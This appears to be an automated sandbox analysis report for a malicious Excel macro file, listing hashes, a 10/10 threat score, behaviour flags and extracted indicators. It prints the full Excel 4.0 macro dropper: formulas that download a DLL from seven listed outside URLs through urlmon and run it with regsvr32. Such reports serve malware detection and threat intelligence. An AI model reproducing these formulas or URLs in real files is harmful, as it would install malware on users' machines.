Overview

overview

10

Static

static

10

68315e1feb...5.xlsm

windows7-x64

10

68315e1feb...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5

  • Size

    30KB

  • Sample

    241120-k3g6psyrcq

  • MD5

    a4b78de4410c0e207506e26bb8b5ed7e

  • SHA1

    bcbd442fffd082a52a7e9efbf798fb8b58066cc7

  • SHA256

    68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5

  • SHA512

    48088cb69a3f337c7532398039964a9cb64c9fa793bf74de39031767d17548133e8a9f174a2cb1f7f5af9f8b5cee25f741f9b6c5f5547b422804a4ce2f5213b4

  • SSDEEP

    384:HwdAZPFhNjUA7icg0SCdiVAg2GKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5NGE6h:QdwFhNbiH2rndFfPdkqstJNGE6h

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.ajaxmatters.com/c7g8t/hAQX/

http://acsconnection.com/wMHahVuKdttKf5doY/

http://aopda.org/wp-content/uploads/dnQjiyCcSvTbX/

http://www.seroja.edu.my/wp-includes/xL7xTYNQ/

http://intranet.fiscaltech.com.br/wp-softwares/G2DUFrG3OIV/

http://www.ifscapital.com.my/G1lIGo/

http://topadmin.topinteriors.co.in/tabler-dist/ga2l8Ioyrba/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/hAQX/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://acsconnection.com/wMHahVuKdttKf5doY/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/dnQjiyCcSvTbX/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.seroja.edu.my/wp-includes/xL7xTYNQ/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://intranet.fiscaltech.com.br/wp-softwares/G2DUFrG3OIV/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ifscapital.com.my/G1lIGo/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://topadmin.topinteriors.co.in/tabler-dist/ga2l8Ioyrba/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.ajaxmatters.com/c7g8t/hAQX/

Targets

    • Target

      68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5

    • Size

      30KB

    • MD5

      a4b78de4410c0e207506e26bb8b5ed7e

    • SHA1

      bcbd442fffd082a52a7e9efbf798fb8b58066cc7

    • SHA256

      68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5

    • SHA512

      48088cb69a3f337c7532398039964a9cb64c9fa793bf74de39031767d17548133e8a9f174a2cb1f7f5af9f8b5cee25f741f9b6c5f5547b422804a4ce2f5213b4

    • SSDEEP

      384:HwdAZPFhNjUA7icg0SCdiVAg2GKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5NGE6h:QdwFhNbiH2rndFfPdkqstJNGE6h

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks